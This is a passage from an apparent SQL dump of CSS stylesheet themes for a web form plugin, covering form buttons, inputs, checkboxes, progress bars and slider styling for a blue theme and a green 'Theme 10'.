100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\nbackground: linear-gradient(to right, #035192 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #0860A9 20{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #0860A9 80{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #035192 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\ncursor: pointer;\r\nfont-size: 17px;\r\nborder-radius: 7px;\r\nmin-width: 80px;\r\nmin-height: 34px;\r\ncolor: #fff;\r\nborder: 1px solid #3A8BCF;\r\nmargin: 5px;\r\nbox-shadow: 0px 0px 1px 1px #063A66;\r\nfont-family: Segoe UI;\r\n	}\r\n.button-reset {\r\n	background: transparent;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 7px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 1px solid #c9c9c9;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_page {\r\n	background: #D1E0F0;\r\n	padding: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n	border-top: 1px solid #004D8E;\r\n}\r\n.wdform_column {\r\n	padding-right: 30px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform-field-section-break2 {\r\n	background: url([SITE_ROOT]/images/01/shadow.png) no-repeat left center;\r\n	background-size: contain;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: #0559A0 ; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #00457F 1{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #0559A0 20{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #0E6AB8 80{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #006CC7 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(1{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #00457F ), color-stop(20{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #0559A0 ), color-stop(80{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #0E6AB8 ), color-stop(100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #006CC7 )); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #00457F 1{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #0559A0 20{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #0E6AB8 80{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #006CC7 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #00457F 1{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #0559A0 20{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #0E6AB8 80{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #006CC7 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #00457F 1{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #0559A0 20{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #0E6AB8 80{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #006CC7 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* IE10+ */\r\nbackground: linear-gradient(to right, #00457F 1{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #0559A0 20{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #0E6AB8 80{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #006CC7 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* W3C */\r\n	text-align: left;\r\n	padding: 7px 30px 10px 10px;\r\n	border-top-left-radius: 0px;\r\n	border-top-right-radius: 10px;\r\n	border-bottom-right-radius: 10px;\r\n	border-bottom-left-radius: 0px;\r\n	-moz-box-shadow: inset 51px 0px 8px -50px #636363, 4px 0px 7px 0px rgba(0, 0, 0, 0.23);\r\n	-webkit-box-shadow: inset 51px 0px 8px -50px #636363, 4px 0px 7px 0px rgba(0, 0, 0, 0.23);\r\n	box-shadow: inset 51px 0px 8px -50px #636363, 4px 0px 7px 0px rgba(0, 0, 0, 0.23);\r\ncolor:#fff;\r\nfont-size:18px;\r\n}\r\n\r\n.wdform_section_break {\r\n	margin: 16px 0px;\r\nfont-size:18px;\r\n}\r\n.wdform_section {\r\n	display: table-row;\r\n}\r\nselect {\r\n	border-radius: 7px;\r\n	height: 32px;\r\n	overflow: hidden;\r\n	border: 1px solid #ccc;\r\n	padding: 2px;\r\n	outline: none;\r\n}\r\ninput[type=\"text\"]{\r\n	border-radius: 7px;\r\n	height: 30px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type=\"password\"]{\r\n	border-radius: 7px;\r\n	height: 30px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 7px;\r\n	height: 30px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type=\"text\"]:focus{\r\n	border-color: #004D8E;\r\n	outline: none;\r\n}\r\n\r\ninput[type=\"password\"]:focus{\r\n	border-color: #004D8E;\r\n	outline: none;\r\n}\r\n\r\ntextarea:focus{\r\n	border-color: #004D8E;\r\n	outline: none;\r\n}\r\n\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 70px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 15px;\r\n	height: 16px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 5px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \"\";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/01/checkbox.png);\r\n	border-radius: 2px;\r\n	top: 0px;\r\n	left: 2px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/01/date.png) no-repeat left 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 37px;\r\n	height: 30px;\r\n	position: relative;\r\n	left: -35px;\r\n	vertical-align: top;\r\n}\r\n.wdform-calendar-button:focus {\r\n outline:none; \r\n}\r\n.wdform-calendar-button:focus {\r\n	outline:none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 15px;\r\n	height: 16px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 5px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \"\";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 10px;\r\n	background: #615F60;\r\n	border-radius: 2px;\r\n	top: 3px;\r\n	left: 3px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	border-top: 1px solid #D8D6D7;\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: \"Lucida Grande\", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 7px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #0D5492;\r\n	cursor: pointer;\r\n	background-color: #7FA6C6;\r\n	margin: 1px;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding-top: 5px;\r\n	padding: 5px 30px 0px 30px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #004D8E;\r\n	margin: 1px;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	padding: 5px 30px 0px 30px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 25px;\r\n	line-height: 25px;\r\n	border-top-left-radius: 17px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #00559D ; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #00559D 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #005BA7 67{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #00559D 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #00559D ), color-stop(67{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #005BA7 ), color-stop(100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #00559D )); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #00559D 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #005BA7 67{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #00559D 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #00559D 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #005BA7 67{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #00559D 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #00559D 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #005BA7 67{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #00559D 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* IE10+ */\r\nbackground: linear-gradient(to right, #00559D 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #005BA7 67{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #00559D 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\n	vertical-align: middle;\r\n}\r\n.page_percentage_deactive {\r\n	height: 25px;\r\n	line-height: 25px;\r\n	background-color: #7FA6C6;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n	border-top-left-radius: 17px;\r\n	border-top-right-radius: 17px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_page_navigation span:first-child {\r\n	border-top-left-radius: 17px;\r\n}\r\n.wdform_percentage_arrow {\r\ndisplay: inline-block;\r\nwidth: 21px;\r\nheight: 25px;\r\nbackground-color: #0057A0;\r\nposition: relative;\r\nleft: -15px;\r\nz-index: 0;\r\nvertical-align: middle;\r\n-moz-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-10deg) skewY(0deg);\r\n-webkit-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n-o-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-10deg) skewY(0deg);\r\n-ms-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-10deg) skewY(0deg);\r\ntransform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-10deg) skewY(0deg);\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px -14px 3px 9px;\r\n	color: #FFFFFF;\r\n	font-weight: bold;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 25px;\r\n	height: 25px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform_button button {\r\n	background: #e4e4e4; /* Old browsers */\r\n	background: -moz-linear-gradient(top, #e4e4e4 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #cccccc 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, left bottom, color-stop(0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #e4e4e4), color-stop(100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #cccccc)); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(top, #e4e4e4 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #cccccc 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(top, #e4e4e4 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #cccccc 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(top, #e4e4e4 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #cccccc 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* IE10+ */\r\n	background: linear-gradient(to bottom, #e4e4e4 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #cccccc 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* W3C */\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 7px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #787878;\r\n	border: 0px;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}',0),(37,'Theme 10 green','.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #D8E5DB;\r\nborder: 1px solid #007616;\r\nmargin-bottom: 10px;\r\ncolor: #007616;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type=\"text\"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n	content: url([SITE_ROOT]/images/01/03/next_hoverbg.png) url([SITE_ROOT]/images/01/03/previous_hover.png) url([SITE_ROOT]/images/01/03/next_hover.png);\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 3px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #006C14 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #006C14 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #006C14 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #006C14 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #006C14 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #006C14 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\nui-state-hover {\r\n	background: #006C14 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff;\r\n	margin: 7px 0px;\r\n}\r\na.ui-slider-handle {\r\n	border-radius: 10px;\r\n	border: 2px solid #fff;\r\n	background: #A4A4A4;\r\n}\r\n.ui-slider-horizontal .ui-slider-handle {\r\n	top: -8px !important;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #A4A4A4 !important;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 7px;\r\n	padding: 2px 0px 2px 2px;\r\n	font-size: 13px;\r\n	height: 26px;\r\n	line-height: 26px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 28px;\r\n	width: 32px;\r\n	background: url([SITE_ROOT]/images/01/01.png) 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 1px;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text] {\r\n	margin: 0px;\r\n}\r\ninput[type=password] {\r\n	margin: 0px;\r\n}\r\ninput[type=url] {\r\n	margin: 0px;\r\n}\r\ninput[type=email] {\r\n	margin: 0px;\r\n}\r\ninput.text {\r\n	margin: 0px;\r\n}\r\ninput.title {\r\n	margin: 0px;\r\n}\r\ntextarea {\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-page-and-images:after {\r\n	width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n	content: \"\";\r\n	display: block;\r\n	height: 17px;\r\n	background: url([SITE_ROOT]/images/01/0.png) no-repeat center center;\r\n	position: relative;\r\n	background-size: cover;\r\n	top: -17px;\r\n	left: -50px;\r\n	padding-left: 100px;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 7px;\r\n	height: 27px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n}\r\n.file-picker {\r\n	width: 38px;\r\n	height: 34px;\r\n	background: url([SITE_ROOT]/images/01/upload.png);\r\n	display: inline-block;\r\n}\r\ndiv.wdform-page-button {\r\n	color: #414141;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 36px;\r\n	line-height: 36px;\r\n	background: url([SITE_ROOT]/images/01/nextbg.png) no-repeat right center;\r\n	-webkit-background-size: cover;\r\n	-moz-background-size: cover;\r\n	-o-background-size: cover;\r\n	background-size: cover;\r\n	border-style: solid;\r\n	padding: 0px 15px;\r\n	vertical-align: middle;\r\n	border-color: transparent;\r\n}\r\ndiv.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/01/03/next_hoverbg.png) no-repeat right center;\r\n	-webkit-background-size: cover;\r\n	-moz-background-size: cover;\r\n	-o-background-size: cover;\r\n	background-size: cover;\r\ncolor:#fff;\r\n}\r\n.next-page div.wdform-page-button {\r\n	border-width: 0px 18px 0px 0px;\r\n	-moz-border-image: url([SITE_ROOT]/images/01/next.png) 0 36 0 0 stretch;\r\n	-webkit-border-image: url([SITE_ROOT]/images/01/next.png) 0 36 0 0 stretch;\r\n	-o-border-image: url([SITE_ROOT]/images/01/next.png) 0 36 0 0 stretch;\r\n	border-image: url([SITE_ROOT]/images/01/next.png) 0 36 0 0 stretch;\r\n	box-shadow: inset 51px 0px 8px -50px #636363;\r\n}\r\n.next-page div.wdform-page-button:hover {\r\n	-moz-border-image: url([SITE_ROOT]/images/01/03/next_hover.png) 0 36 0 0 stretch;\r\n	-webkit-border-image: url([SITE_ROOT]/images/01/03/next_hover.png) 0 36 0 0 stretch;\r\n	-o-border-image: url([SITE_ROOT]/images/01/03/next_hover.png) 0 36 0 0 stretch;\r\n	border-image: url([SITE_ROOT]/images/01/03/next_hover.png) 0 36 0 0 stretch;\r\n}\r\n.next-page:before {\r\n	content: \"\";\r\n	height: 56px;\r\n	vertical-align: middle;\r\n	background: url([SITE_ROOT]/images/01/shadow.png) no-repeat left center;\r\n	background-size: contain;\r\n	width: 7px;\r\n	display: inline-block;\r\n	position: relative;\r\n	